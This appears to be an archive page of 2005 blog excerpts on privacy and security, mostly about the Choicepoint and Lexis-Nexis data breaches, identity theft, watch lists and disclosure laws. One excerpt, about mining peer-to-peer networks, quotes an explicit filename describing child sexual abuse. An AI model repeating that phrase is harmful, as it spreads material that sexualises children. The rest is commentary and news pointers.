In January, I blogged about the city of Truro, Mass, trying to get DNA samples from all 790 residents. (“DNA Dragnets” and “DNA Dragnets and Criminal Signaling.”) The New York Times reports that they’ve arrested someone: Mr. McCowen was first considered a possible suspect in April 2002, three months after the murder, Mr. O’Keefe said, […]

 

Choicepoint, April 15

Inside Bay Area claims “Protecting consumers’ personal information may not be possible.” Former Congressman Bob Barr, writing for Findlaw, disagrees in an insightful article. Robert Gelman suggests that government only buy from vendors who voluntarily follow fair information practices in the second half of his DMNews editorial, “ . . And Into the Fire” Businessweek […]

 

Congratulations, Choicepoint!

You’ve won the Big Brother award for Lifetime achievement! It was a tough battle for top place this year, and while Choicepoint was the people’s fave, we all know that those privacy elitists don’t really care about the little people. Other winners included California’s Brittan Elementary. The Department of Education got worst government department, despite […]

 

Small Bits of Chaos: Video, Anonymous Blogs, Real ID Act dead

This New York Times article on Videos Challenge Accounts of Convention Unrest covers the fascinating conflict between the video and human memories of an event; the issues raised by transparent video editing, and other issues. Worth reading. During a recess, the defense had brought new information to the prosecutor. A videotape shot by a documentary […]

 

Choicepoint, April 14

Following yesterday’s Congressional testimony, there’s analysis by Thomas Greene in The Register, also in Internet News. The Atlanta Journal Constitution reports that Choicepoint VP Doug Curling, and LexisNexis President Kurt Stanford both seemed to come out as accepting of extending fair information practices to their businesses. The testimony prompted editorials in USA Today, and the […]

 

Dear Canon

Dear Canon, Why do you make it harder for me to download the software for my camera than to download a brochure? Is it because I’m stuck and have already bought your camera? Do you hope I’ll forget this experience? Because I can’t figure out how to make either of my web browsers suck enough […]

 

Ed Felten on Passports

Yesterday at CFP, I saw an interesting panel on the proposed radio-enabled passports. Frank Moss, a State Department employee and accomplished career diplomat, is the U.S. government’s point man on this issue … In the Q&A session, I asked Mr. Moss directly why the decision was made to use a remotely readable chip rather than […]

 

Breaches: Tufts, GM/HSBC/Ralph Lauren

Infoworld reports 106,000 Tufts Alumni getting letters, and Cnet reports that “A bank tells 180,000 people who used their GM MasterCards at Polo Ralph Lauren that their data may have been stolen.” (That sounds like a strange set of circumstances. Who sorts their data by credit card issuer?)

 

Orientation and Supreme Court Rulings

Over at Volokh, Orin Kerr has a beautiful analogy which illustrates orientation issues in reading Supreme Court cases. By orientation, I mean the sum of cultural, educational, and training experience that come together to influence the way people interpret the things they observe. (In other words, what Boyd meant.) Kerr writes (emphasis mine):  I think […]

 

Rational Response?

Sitting at a coffeeshop today, I listened to the fellow behind me try to get Dell and Equifax to agree to fix his credit. It seems that his father passed away recently, in debt to Dell over a computer. That debt is now on his credit report, despite his not being a co-signer for the […]

 

Small Bits: Iran annoyed, Academic Publishing, Immigration law, Iraqi Justice

Iran seems to be annoyed that Canada is engaged in a minimal attempt to find out who murdered Zahra Kazemi, and see that they’re brought to justice. It seems that more and more academics are getting the word: Access to your research is good. I wonder when the computer scientists at IEEE and ACM will […]

 

Choicepoint Roundup, April 13

Internet News has one of many reports on the latest breaches, this one titled “Feinstein Tightens ID Theft Proposal” Bob Sullivan at MSNBC reports on background checks: But experts say the nationwide tallies are often full of holes, and contain as few as 70 percent of all felony conviction records, leading in turn to a […]

 

Choicepoint's "Privacy" Officer

Declan has some choice words about Choicepoint’s new Credentialling, Compliance and privacy officer, in “Sidelining Homeland Security’s privacy chief:” DiBattiste sounded like she was replying to a pesky reporter when she wrote back [To TSA Privacy Officer Nuala O’Conner Kelly]: “TSA Public Affairs has no information in response to your request.” How fitting, then, that […]

 

59 breaches at Lexis-Nexis

[T]he company said just 2% of those informed by the company in March of the security breach had accepted its offer of free credit monitoring and none had reported identity theft. All the others will also be offered the services it said. (From CNN, or see the statement here.) So, let’s review. A slew of […]

 

Choicepoint, April 9-12

The Daily Caveat tells us that “Choicepoint Changes Access to Personal Data, and Research News has more. No word on what level of audits Choicepoint will be doing. It sounds like there will be a pulldown menu or checkboxes for “allowable uses,” perhaps causing people to think for a bit, then get used to selecting […]

 

Happy Gagarin Day!

Forty-four years ago today, Yuri Alexeyevich Gagarin became the first person to fly in space. There’s a fascinating anecdote from Doug Higley at the Encyclopedia of Astrobiology, Astronomy, and Spaceflight. Higley was with the US Army Security Agency unit tasked with monitoring Russian missiles on the day Gagarin flew. Or read up on the Yu. […]

 

Lexis Nexis, Tenfold

Lexis Nexis is saying that they understated the number of victims in last month’s incident. It is not 32,000, but 310,000. Kudos to them for stepping up and admitting to it. It’s the right thing both ethically and strategically. Reed spokesman Patrick Kerr said that the first batch of breaches was uncovered by Reed during […]

 

A Picture is Worth A Thousand Words

I’ve briefly mentioned the story of a fellow getting his finger hacked off so the thieves could make off with his S-Class Mercedes. But images are far more powerful than words. Google claims that the German reads “Forest worker…or S-Class owner?” I’d love it if someone could offer a translation of the German text in […]

 

AdScam in Canada

Apr. 10 – People who compare Adscam to Watergate are missing a vital difference. Whereas the Watergate hearings began with the use of private donations to President Nixon’s re-election campaign for illegal operations, Adscam is increasingly exposing the use of public, taxpayer money to fund the election campaigns of the Liberal Party. So says Being […]


Anti-Terror Funds Earning Interest

Over drinks, I like to enrage my computer security colleagues by suggesting that we’re spending too much on computer security. My evidence for this is that, despite all the attacks and break-ins and worms and what-have-you, no one’s going out of business. But the news in Saturday’s Washington Post, “Most Area Terrorism Funding Not Spent,” […]


Dear American Airlines

Over at Boing-Boing, Cory posts the latest in his saga of having American Airlines ask for a written list of his friends. As I thought about this story, I realized something very worrisome. I fly American! I also realized that I don’t know if I’ll have the right papers with me when I do. So […]


Small Bits: Digitizing Art, Making Sense, Wages of Sin, Pookmail

Capturing the Unicorn is an article at the New Yorker about the hubris of technologists trying to capture art. (The technologists win, but the archivist in me asks: CDs?) 13 things that do not make sense is a New Scientist article about, well, 13 things that don’t make sense. Some foolish people might look at […]


Workers Steal PINs, Cash

BANGALORE, India — Former employees of a call center in Pune, India, were arrested this week on charges of defrauding four Citibank account holders in New York, to the tune of $300,000, a police official said. The three former employees of Mphasis BPO, the business process outsourcing operation of Bangalore software and services company Mphasis […]


Choicepoint, April 8

Choicepoint has been nominated for a lifetime Big Brother award. Best of luck, folks! Prophet or Madman points to an article at Knowledge@Wharton about the issues raised by the case. Robert Gellman has a column in DMnews “Out of the Frying Pan.” Choicepoint has announced their earnings call and webcast, on April 21. (Is ‘before […]


Small Bits: Hezbollah, Blowhards, Shit & Cookie Monster

JihadWatch points to a Sunday Times article: PALESTINIAN fighters have revealed that Hezbollah, the militant Lebanese group backed by Iran, is offering to pay for attacks aimed at shattering the fragile truce with Israel. Maciej Ceglowski has some harsh words for Paul Graham’s essay “Hackers and Painters,” in an essay “Dabblers and Blowhards.” However, he […]


Small Bits

Newsday reports on Orange County, Florida Sheriff Kevin Beary abusing law enforcement access to records. He sent a letter to Alice Gawronski’s home, objecting to her letter to a local newspaper. He claims it was “legitimate use of public records.” Dan Farmer’s new company, Elemental Security, has launched. Speaking of launched, Steve Hofmeyer, of Sana […]


Interim Pope

Normally, I try to avoid comment on religious matters, but I think it’s important to be aware that Samablog has taken the first step to becoming an anti-Pope by declaring himself Interim Pope. The blogosphere shall elect the next pope! Or something. We bloggers didn’t cause the Thirty Years’ War.


Choicepoint, April 3-7

Diebold, Choicepoint Partner to Offer Innovative Voting Technology was an April Fools item I forgot to blog: Alpharetta, GA – Diebold Election Systems and Choicepoint, Inc., today announced a joint venture that could revolutionize the voting market. The concept is simple: combine Diebold’s demonstrated expertise in voting systems with Choicepoint’s superior data-mining techniques to produce […]


Anonymous Blogging Project

I’ve mentioned the Spirit of America anonymous blogging project before. To help move things forward, I’ve offered Jim Hake my assistance as a project coordinator. As Jim describes the project: The project is to review all available technologies and techniques and get the input of the best minds available to put together a plan for […]


More on AIM & Privacy

Recently, I griped about AOL’s privacy policy. Today, PGP Corp announced their second public beta of PGP 9, which includes support for encrypting AIM sessions. It’s not clear if this will be in the personal edition. I sure hope so.


5th Privacy Enhancing Technologies Workshop

The program has been posted for The Fifth Privacy Enhancing Technologies Workshop, which will be held in Dubrovnik, Croatia, 30 May – 1 June. (Corrected spelling.) There’s an affiliated executive briefing, 2-3 June.


4th Workshop on the Economics of Information Security

The Fourth Workshop on the Economics of Information Security will be held in Boston, June 2-3. The schedule is now online. I’ll be presenting a short essay on “Avoiding Liability: An Alternative Route to More Secure Products” at the rump session. I’d love feedback. Ian Grigg has talked about alternate review systems.


Relentless Navel Gazing

I never really liked the bar down the side of my blockquotes, and have finally replaced them, with a style stolen from Simple Thoughts. They’re in 52pt Copperplate as transparent background gifs. Does anyone know how to add a second image, at bottom right? Putting background: url(http://www.emergentchaos.com/close-quote.png) no-repeat bottom right; url(http://www.emergentchaos.com/quote.png) no-repeat top left; into […]


Small Bits: Canada, DNA, Microsoft and Tea

While publicly recalling their Ambassador over the brutal murder of Zahra Kazemi, the Canadian government was playing host to Iranian officials, looking for security information, reports the CBC: In dozens of e-mails, there is no mention of Kazemi, and no one questions why Canada would help Iran, considered by some to be a brutal police […]


Making Steady Progress, Keep Paying Us

In this New York Times article on NASA’s “broken safety culture,” we find: In the months after the Columbia disaster in February 2003, the space agency started several initiatives to enhance safety, including the creation of an Engineering and Safety Center at its Langley Research Center in Virginia. It has worked with Behavioral Science Technology, […]


Clueless about ID Theft

I’m not sure if Jon Ostik’s column “Want to prevent ID theft? Get back to basics” is a brilliant April Fool’s Day joke, or, an example of, as the Identity Theft blog claims, “Many “security professionals” are clueless about identity theft.” Before anyone panics, the logical first step in any security process is an audit. […]


One Nice Thing About a Written Constitution

A legal principle which prevents people being tried for the same crime twice is being scrapped in England and Wales. The ban on “double jeopardy”, which has existed for around 800 years, will be consigned to history from Monday. The Court of Appeal can now quash an acquittal and order a retrial when “new and […]


Cool Tech Not at RSA

Quick! Someone get these folks a marketing department! Someone showed me a cool password storage token from Mandylion Labs. You can load passwords over a little electronic interface, and then keep long lists of superuser passwords in your pocket. I had to mail my buddy to get their name. It seems somewhat better than a […]


Stroopwafels!

My local supermarket has Stroopwafels! They’re cleverly hidden in the cookie section, which I carefully avoid (due to a lack of willpower). But next time someone gripes about global free trade, I have a miniature stroopwafel to throw at them. Yes, I got the mini ones. No, I’m neither illiterate, nor smoking anything. I got […]


BlogRoll

I’ve added Screendiscussion to the blogroll. I don’t always agree with Geoff, but he seems insightful, interesting, and genuinely willing to grapple with the questions that his profession raises. He also posts actual posts, rather than a clipblog. For example, this morning’s post is “Background Checks Must Be Relevant,” and points out a case where […]


Choicepoint, April 2

The Atlanta Journal Constitution has an editorial “ChoicePoint’s offer not enough:” The better solution would be to prohibit companies such as ChoicePoint from warehousing personal information in the first place, since security has proved so problematic. Computerized collections of consumers’ Social Security numbers, credit information, driving histories, medical and court records may make commerce […]


Information Security Magazine on Choicepoint

Information Security Magazine has an interview with Choicepoint CISO Richard Baich. It’s behind a subscriber-wall, so I’m excerpting bits of it after the read more. (Via Run-DMZ.)


Small Bits: Biometrics in Drivers Licenses, Cars, Privacy Art

Grits for Breakfast writes about his testimony before the Texas House in Biometrics debate hinged on ID theft: The committee also seemed surprised that DPS had included facial recognition technology in their drivers license re-engineering RFP, even though the Legislature did not approve it. My understanding is that the AAMVA (American Association of Motor Vehicle […]


Iranian Treatment of Journalists

Rape, Torture, and Lies An ongoing Canadian saga has a sad new twist today: photojournalist Ziba Zahra Kazemi was likely brutally tortured and raped before her death in Iran in 2003. Arrested after a demonstration, the official Iranian line has been that her death was an accident due to injuries from a fall. The ER […]


Choicepoint Acquires Emergent Chaos

Alpharetta, Georgia, April 1 /PRNewsWire/ Alpharetta-based information broker Choicepoint today announced its intent to acquire the blog “EmergentChaos,” citing market synergies, cost reductions, and new revenue opportunities. Financial terms of the deal were not disclosed, but Choicepoint CEO Derek Smith said “We knew just which buttons to push.” Emergent Chaos is a weblog, or “blog,” […]


Choicepoint, March 29-31

Alacrablog discusses a Morgan Stanley research report: Certainly manageable numbers, but I think the report underplays both the potential growth in these markets prior to these incidents and the rising costs due to increasing regulation of the data brokers. There’s also an interesting post rounding up the SIA Anti-Money Laundering conference. The Atlanta Business Journal […]


"Public Availability of Private Information"

Screendiscussion makes a case for criminal records searching as an adjunct to a background check: One of the biggest downsides is that the records can only be searched by name, an occurrence that is becoming more common even at the lower courts. This might not be a problem if the name being searched is pretty […]


Three Times is Enemy Action

With the announcement yesterday of a stolen laptop with 30 years of alumni social security numbers on it, and the October break-in that led to 1.4 million people being exposed, how long until California forbids the University from holding such numbers? Clearly, they’re not to be trusted; students have no choice but to provide that […]


P2P, Filenames

The other day, Samablog and I did some P2P mining, after Michelle Malkin blogged about it. She links to P2P Provides Safe Haven For Pedophiles. There, Rick shows screen captures of extremely disgusting file names (“2 yo getting raped during diaper change”). He doesn’t download any files, but takes this as evidence for his title. […]


Optimism about the Future

I was talking to someone about a New York Times story “U.S. Is Examining a Plan to Bolster the Rights of Detainees.” The story contains the line: Those changes include strengthening the rights of defendants, establishing more independent judges to lead the panels and barring confessions obtained by torture, the officials said. I made a […]


Choicepoint, March 27-28

EPIC has obtained documents which… … reveal that Choicepoint proposed the sale of detailed personal information to the Bureau for law enforcement purposes. The documents show an extraordinary range of data sources, including e-mail registration, cookies, spyware, employment screening reports, motor vehicle records, drug screening results, professional licensing, Social Security Numbers, wireless phones records, and […]


Emergent Predictions

By the end of 2005, we will have had a month with at least 30 disclosures of serious security breaches, making private information about people available. At least 10 of these breaches will involve data which organizations are required by law to store and protect. This will cause a set of Congressional hearings, in which […]


Watch Lists: Juan Carlos Merida

Juan Carlos Merida is an unusual victim of the watch lists. He knows why he’s on one. As the New York Times reports, while a volunteer at the Airman Flight School, he gave rides to lots of students. The students he gave rides to included Zacarias Moussaoui, who is currently awaiting trial on suspicion of […]


RFID Kills

The US Government is pushing a plan to add radios to every passport in the world. These radios will broadcast all the information in your passport to any immigration officer, ID thief, or terrorist who wants it. Want to see if there are more Americans on the right or left side of the plaza? No […]


Microsoft Security Lifecycle

Michael Howard mentions that Microsoft has published their Software Development Lifecycle for security. Slag all you want, but I don’t see a lot of other vendors doing this. And now, if you need leverage to get buy in, you can either say, “We should emulate Microsoft…” or “Even Microsoft does…” It’s a win. Thanks for […]


Framing Effects & Law Reviews

Framing effects are what a variety of types of academics call the variety of contextual effects on perception. For example, six months ago, this laptop went for $4800, and now it’s just $3,500! Similarly, law reviews, where lawyers write for each other, are usually exceptionally long, from my perspective. And so we get Orin Kerr […]


Small Bits: Long tunnels, Marburg virus, Cyber Cons

Iraqi prisoners have dug a 200m tunnel out of one of the US run prisons in Iraq. The BBC has pictures. The Marburg virus is spreading in Angola. Marburg is an Ebola-like haemorrhagic agent. Some analysis. Charles Cooper has some commentary ranting about the state of the information security industry at cnet: It’s tempting to become […]


Lying to Congress, Murdering Prisoners Now Legal

Ryan Singel reports that lying to Congress is now legal, at least according to TSA spokeswoman Amy Von Walter. “Von Walter also indicated the agency is working to make sure that the public and Congress are better informed about the agency’s actions.” In other news, the Pentagon will ignore the recommendation of the Army Criminal […]


Choicepoint, March 24/25

The Federal Reserve has joined the FDIC in ordering banks to notify customers of breaches. Forbes reports that Choicepoint director Thomas Coughlin has resigned his day job at Wal-Mart: “A senior board member of Wal-Mart Stores Inc. resigned Friday following an internal investigation related to personal reimbursements, billing and company gift cards.” [Choicepoint CEO] Derek […]


Security In a Changing Nation

Screendiscussion responds to my comments about “Three Privacy Breaches” in Security In a Changing Nation. He sums up his argument as “Why? The reason is that we, as a nation, have become extremely security conscious in the past few years.” I think this is only partially correct. I suspect that this is part of it. […]


Small Bits of Chaos: Anonymity, Citizenship

Ed Felten summarizes Wendy Seltzer’s comments on the NYT “Open Wifi is evil” article: “anonymous sources claim anonymity is evil.” The Department of Citizenship amends their terms and conditions. (Via Michael Froomkin.)


Discretionary Disclosure

A man who pleaded guilty to hacking into an Arkansas data company’s computer system and stealing personal identification files was sentenced Wednesday to nearly four years in federal prison. Daniel J. Baas, 26, of suburban Milford, entered his plea in December 2003, after being indicted that August. Baas was a systems administrator for Market Intelligence […]


Disclosure Laws & Regulations

Declan McCullagh writes about new rules requiring banks to disclose breaches, as promulgated by an alphabet soup of federal regulators. A brief digression: The new guidelines seem to make sense, but it’s difficult to figure out whether they go too far or not far enough. Normally consumers can shop around and choose products based on […]


"A Unified Theory of VC Suckage"

Brad Feld pointed to an essay by Paul Graham, entitled “A Unified Theory of VC Suckage.” (VC is short for venture capitalist, the folks who invest in certain types of startup companies.) I used to take it for granted that VCs were like this. Complaining that VCs were jerks used to seem as naive to […]


"What Would Gandhi do?"

“What would Gandhi do?” is the title of a soul-searching post by Joi Ito about positioning. It reminded me of a passage in William Shirer’s memoir of his time with Gandhi. I’d like to quote the passage, which ends chapter 11, and then add some comments. The context is Gandhi’s visit to England, and in […]


Three Privacy Breaches

“DMV hopes to reassure clients about security.” The DMV on Wednesday will send out letters describing the incident and new driver’s licenses with different numbers to the 8,738 people whose personal information was stored on the stolen computer, said Kevin Malone, spokesman for the DMV. “Audit: State voter system left information vulnerable:” The state elections […]


Small Bits: Hell, TSA, Insurance, Mutual Funds, Telephone Privacy

Asteroid analyzes Sisyphean volunteers and the modern condition in a brilliant essay. It just goes to show, the Greeks really did invent everything. Robert Poole and Jim Harper debate the TSA in “Transportation Security Aggravation” at Reason. Tyler Hamilton looks at two schemes to cut your auto insurance premiums by monitoring your driving, and their […]


Choicepoint, March 22/23

The Daily Caveat rounds up the five shareholder lawsuits against Choicepoint. The Atlanta Business Journal has an article on Choicepoint’s executive compensation. Kim Zetter at Wired has a 3 page story on Choicepoint’s Checks Under Fire. CNN reports that only 11% of ID theft occurs online. Well, actually, there might be some methodological problems. It’s […]


Those Exemplars of Ethics at the UN

Read this transcript about former UN Oil-for-Food program lead, Benon Sevan. Apparently the UN is paying his legal fees. Question: The other question was a follow-up to a story in the New York Sun today. The United Nations has been paying Benon Sevan’s legal fees. Is this appropriate? Is this normal practice? And why did […]


How Many Home Pages?

I was trying to enter someone’s web address into Apple’s Address book recently. Unfortunately, Apple believes that you have a home page. This is at odds with almost all the other fields in Address Book. You can have lots of phone numbers. A profusion of email addresses. And one home page. Me? I have a […]


Choicepoint, March 21

Businessweek has an editorial, saying strong regulation is unlikely, but credit freezes, mandatory disclosure, and liability for breaches should come. (I’d argue that liability for inaccuracy, creating a duty to the subjects of a database should also be considered a floor for a new law.) EPIC has written to the FTC, critiquing their testimony. (Via […]


Kyrgyzstani Democracy

The BBC is reporting that Opposition demonstrators in Kyrgyzstan have taken control of a town, as protests continue a week after the second round of disputed elections. In Jalal-Abad, a police station was set on fire, and protesters took control of the airport to prevent reinforcements being flown in. Protesters say President Askar Akayev’s party […]


Response to Solove & Hoofnagle

As I mentioned previously, Daniel Solove and Chris Hoofnagle have written a paper on “A Model Privacy Regime.” This post makes a lot more sense if you’ve read their paper. I’ve read through it, and think that it’s pretty good. My responses to specific sections are below. First I’d like to comment on the free […]


Choicepoint, March 20

Susan Kuchinskas writes “No Security in SSNs?” for Internetnews. Credit bureaus and information brokers will doubtless lobby Congress, saying changes to the rules will hurt their business. But Solove said their voices might not carry as much weight as they used to. “They had their chance. They weakened the legislation, and, as a result, more […]


Small Bits: Avoid Brink's, Code Metrics, Privacy Regs, Blackstone

Ed Foster writes about Brink’s contract provisions with contracts that don’t go month to month, but year to year when you try to leave. Brink’s is fully within their right to write such contracts, and I’m free to suggest that you should consider shopping elsewhere. (Via Dan Gillmor.) Mark Miller suggests a new code metric, […]


Choicepoint, March 19

Not In Chicago Anymore comments on Handling of Credit Related Information, and some of the possible repercussions of new law. Ryan Singel at Secondary Screening points out in “Popcorn, popcorn” that (Choicepoint Vice President) McGuffey testified under oath that he told (CPS President) Doug Curling about the investigation in November, which would mean that Curling […]


Screening the Open Society Paradox

If you’ve been enjoying the Chaos-Paradox spat, Ryan Singel’s Paradox Still a Paradox is not to be missed: But when it comes to big data brokers that compile dossiers on Americans and list marketing firms that enhance their lists with data bought from data brokers, Bailey thinks they should be immune from the return gaze, […]


Bad advice on SSNs

Bad advice on use of social security numbers abounds, often in technical documentation. Credit goes to reader Jonathan Conway for digging many of these out. There are a few very common errors which we can find, thanks to Jonathan’s research: Social security numbers are un-changing. No, they are not. Victims of identity theft, domestic abuse, or […]


Choicepoint, March 18

ChoicePoint’s data bonanza lures thieves, in the Atlanta Journal Constitution. The Q Speaks asks what have we wrought in “ID theft writ large.” In another example of what we have wrought, “the Fairfax County’s School Board awarded a contract Thursday night to ChoicePoint, Inc., for testing student athletes and bus drivers for drug and […]


Colleges and SSNs

For a very long time, colleges have been using social security numbers as identifiers for their prospects, students, and alumni. This is starting to change, driven by liability and brand concerns. No school wants to transform your (hopefully) fond memories of your time there into a firestorm over privacy. From ZDNet: Dunn said [Boston] college […]


Chris Allen and Socializing

Chris Allen has been doing a series of posts on the sizes of social groups, what factors can make groups work and not work, and related bits, like the use of software to help manage groups of friends. His latest post is Dunbar, Altruistic Punishment, and Meta-Moderation. It concludes: In summary this research offers me […]


Google Makes It Look Easy

Google Labs has done an OSX Dock style home page. It’s pretty cool. What makes it cool is not the graphical style it presents, but the brilliance of the icon design. If you know what services Google offers, the icon makes sense. (I had to mouse over local, video and options to see what they […]


DHS Planning Better

Cryptome publishes “Homeland Security Council: 15 Attack Scenarios“, “DHS Universal Task List v.2.0“, and “DHS Target Capabilities List v.1.0.” It looks like a well executed set of planning docs. Some quotes from the New York Times: The agency’s objective is not to scare the public, officials said, and they have no credible intelligence that such […]


My Categories Suck

The categories I’ve set for this blog are non-functional. I have 16 categories, of which maybe 4 are ever exclusive. Do you look at my categorization of posts? Do you look at the category archives? Should I create a new set of categories? If so, what? (mmm, Choicepoint! Not.) Should I abandon categories and go […]


Choicepoint, March 15

The LA Times has more on what happened, and Choicepoint’s controls. A great many people feel that this is a compelling story. I enjoyed reading the spouter inn. Finally, today’s Two Minutes Hate comes to you from Futurismic. I’ve been covering Choicepoint issues since the scandal broke.


"Taxation Ventage"

Justin Mason has a great rant, titled “taxation ventage.” In the US, every worker is required to prepare and file their own taxes, in detail. Nowhere outside of India can do bureaucracy quite like the US, as far as I can tell — even the Brits have embraced simplicity to a greater degree — so […]


Choicepoint Roundup, March 14

Omari Norman takes issue with the term identity theft. It’s a good point. Paul Syverson has pointed out that correct terms are “fraud,” “misrepresentation” and “libel,” but those don’t seem to have caught on. This ABC News story about how Americans think there’s too much government secrecy doesn’t relate directly to Choicepoint, except the government […]


Privacy and Background Checks

In a comment, Axinar writes: Is it reasonable for an employer to know whether or not a potential employee has a history of violence or theft? Well, probably. And with our liability situation the way it is, generally any company with deep pockets is virtually REQUIRED to run background checks because if an employee “goes […]


What to do, What to do?

Over at Open Society Paradox, Dennis Bailey challenges me: Emergent Chaos documents some problems but ends with a personal slam against ChoicePoint’s CEO. [Ed Note: Technically, we call that the “middle,” not the end.] What would Emergent Chaos have us do? Should we follow the Fair Information Practices and allow 300 million citizens to be […]


Emergent Uses of Technology

I love navel gazing. I try not to expose my readers to too much of it, but this post by Seth Schoen at EFF’s Deep Links captures the spirit I think about when talking about emergent chaos: The Business Models working group‘s mission has been based on the premise that “no system can be properly […]


Why Choicepoint Resonates

It’s now a full month since Bob Sullivan of MSNBC broke the Choicepoint story. I’d like to think back, and ask, why does this story have legs? Why are reporters still covering it? There are a couple of important trends which combine to make this a perfect storm, attractive to editors and readers. (It’s useful […]


Choicepoint Roundup, March 13

Axiomlounge talks about public records, outsourcing, and the public records laws that cause all of this. Joseph Menn has a great story at the LA Times called “Did Choicepoint End Run Backfire?” Menn asks questions about the effect of Choicepoint’s choices in avoiding regulation. Public Domain Progress notes is not archival quality. Speaking of which, […]


More on Nevada DMV

In working on the Choicepoint roundup for tomorrow, I found Axinar pointing to this story about the Las Vegas DMV heist. Apparently, all that encryption? Err. Never mind. But Lewis said Friday that Digimarc Corp., the Beaverton, Ore.-based company that provides digital driver’s licenses in Nevada, told her Thursday the information was not encrypted, and […]


Leaving AIM

Although you or the owner of the Content retain ownership of all right, title and interest in Content that you post to any AIM Product, AOL owns all right, title and interest in any compilation, collective work or other derivative work created by AOL using or incorporating this Content. In addition, by posting Content on […]


Choicepoint Roundup, March 12

Ryan Singel has interesting analysis of the FTC’s Congressional testimony. Ellen Simon of the AP has a story about her Choicepoint and Lexis Nexis files. Hint: They’re imperfect, but that won’t stop them from screwing up your life. Others (nothing to see here, Scott C Smith) touch on the same theme. The Daily Caveat points […]


France Imitates Art, Stalin

Boing Boing comments on a French stamp with an airbrushed picture of Sartre, sans cigarette. However, the French are way behind on this. Uncle Sam led the way in airbrushing cigarettes, but not people, out of pictures, as these two images of blues pioneer Robert Johnson show. The Honolulu Star got a great quote from […]


Hank Asher

Dennis Bailey at The Open Society Paradox objects to my characterization of Hank Asher, and says: Rather than debate the merits of the program, they have to make this a personal attack on the man. Well, let’s talk about the programs. DBT, the first company Asher founded, was deeply involved in disenfranchising Florida voters. MATRIX […]


Small Bits: ID Angel, Books and Garbage

Latanya Sweeney has announced a new tool, Identity Angel, to crawl the web and discover if there’s enough information to steal an identity. Stefan Brands has made the first four chapters of a book on Electronic Money available. This will be a great reference for people wanting to think about privacy and payments. I’d like […]


No Fly List: Welcome, Salman Rushdie

D Magazine is looking for a private plane to transport Salman Rushdie so he can speak at an event in Dallas. Apparently, he’s been denied the ability to board a plane. Maybe someone realized he’s associated with Islamic Terrorists? (Via Virginia Postrel.) In other news, the Coalition of Airline Pilots Association has released an airline […]


New American Privacy Law: What Could It Say?

With recent events (Choicepoint, Bank Of America, PayMaxx, and Lexis Nexis) leading to a new privacy law for the United States, what should it say? How can we tell a good law from a bad one? Some disclaimers: I’m not entirely in favor of a new law. There’s a lot of potential for harm when […]


New Security Blog

I like the cynicism displayed at http://security.typepad.com/, by a squinty fellow who seems to want to remain anonymous.


What's Wrong With Lexis-Nexis?

It seems that Lexis Nexis’s breach was because of bad passwords: The incidents arose from the misappropriation by third parties of IDs and passwords from legitimate customers. I don’t mean to be snide. No, that’s a lie. I do. It’s 2005. You’re making all this data available via a password? Are your auditors telling you […]


Alec Muffet on ID Cards

Alec Muffet provides the best way I’ve seen to get people to take up National ID Cards: Loyalty points. He claims to be kidding, but I’ve already picked up a dozen citizenship points by turning him in for Mocking the Crown. That brings me nearly halfway to an upgraded room next time I’m in the […]


Choicepoint Roundup, March 10

Harry Weber of the Associated Press is looking to talk to Choicepoint employees. Email him at hweber@ap.org. He’s been covering the story since it broke. The readers of Chief Security Officer Online have spoken, and not one opposes more disclosure laws. (As of noon, Thursday.) Bruce Schneier asks why Choicepoint seems to be saying “Please […]


Financial Privacy Regulations, 5 Years Behind?

The American Banker has a long story about how some regulations from GLB are now five years behind schedule: Ironically, both bankers and consumer advocates panned the agencies when they proposed guidelines on identity theft prevention in August 2003. The 25-page guidelines were based on Section 501 of the Gramm-Leach-Bliley Act of 1999, which required […]


1,700 Drivers Licenses stolen

The theft occurred early Monday in a remote industrial area, authorities said. The thieves took blank licenses and laminated covers, a digital license camera, a camera computer and a license printer. … “It’s been pondered that this has national security interests,” [police spokesman Tim] Bedwell said. “But it’s easier to pass a fake ID to […]


Small Bits: How to live, drive, be identified, and stuck in a database.

A great essay on living and working creatively by Milton Glaser (via BoingBoing). What it takes to get a driver’s license in Germany. Stefan Brands On Quintessenz and the Biometric Consortium. Quintessenz is an Austrian civil liberties group that’s learned about how NSA is driving the biometrics industry. What may be the largest database on […]

 

Attackers, Disclosure and Expectations

In both military and information security situations, the position of the attacker is very powerful. An attacker can choose when, where, and how to attack. Attackers are not constrained by change management committees, operational risk, or a need to make economic tradeoffs within a budget. [1] Attackers don’t need to consider other work that needs […]

 

More on Watch Lists

To follow up to my post on Terror Suspects and Firearms, I’d like to take a moment to rail against the Kafka-esque implementation of “watch lists” in the United States. For the FBI, or other investigative or intelligence agencies, to have lists of “interesting people” makes perfect sense. You’ll always have people who you suspect […]

 

Terror Suspects and Firearms

The New York Times is running a somewhat alarmist article, Terror Suspects Buying Firearms, Report Finds. The report says that At least 44 times from February 2004 to June, people whom the F.B.I. regards as known or suspected members of terrorist groups sought permission to buy or carry a gun, the investigation found. In all […]

 

Choicepoint Roundup, March 8

Today’s roundup takes a different turn with more about privacy-invasive infrastructures. Also, previous scammer gets 5½ years, and Choicepoint appoints a new officer to deal with compliance and credentials. Deep in the Heart of … France discusses the move to hosted applications, and ties in Choicepoint as an example of the new security issues, like […]

 

Small Bits: Art, Chopsticks, Security

Stefan Geens points to It Takes More Than Money to Buy a Hot Piece of Art. I Came to Japan Because of the Chopstick makes dinner plates fascinating. Thanks Rosa! Two shorts at AntiTerrorism & Security: The firm running airport security at SFO has been accused of cheating by a former manager. The lawsuit is […]

 

Choicepoint Roundup, March 7

Saturday’s New York Times reports (thanks Alex for the pointer): Lt. Ronnie Williams, project director of the Southern California Identity Theft Task Force, which is investigating the ChoicePoint case, said that the breach was brought to his agency’s attention in late October, and that on Nov. 23, the agency asked the company to delay notifying […]

 

More on CVSS

Eric Rescorla takes note of my CVSS post, and comments that he’s not sure he likes some technical aspects of the system (emphasis added): CVSS does have a formula which gives you a complete ordering but the paper doesn’t contain any real explanation for where that formula comes from. The weighting factors are pretty obviously […]

 

Choicepoint Roundup, March 6

The Atlanta Journal Constitution contains the first MSM discussion I’ve seen of Derek Smith losing his job over this. Evan Hendricks of Privacy Times has a good article in the Washington Post, discussing who owns data, how we’ve gotten here. Axel, of Balrog.de comments “that ChoicePoint does NOT state in that Form 8-K that they […]

 

Economics of Fake IDs

Some states will begin using new watermark technology akin to that used on currency for drivers’ licenses next year… While the backers of these efforts say they herald the demise of the fake ID, officers on the beat have doubts. “They find a loophole and exploit it,” said Sergeant Planeta of the New York document […]

 

Small Bits of Chaos: Advertising and The Gulag Evolution

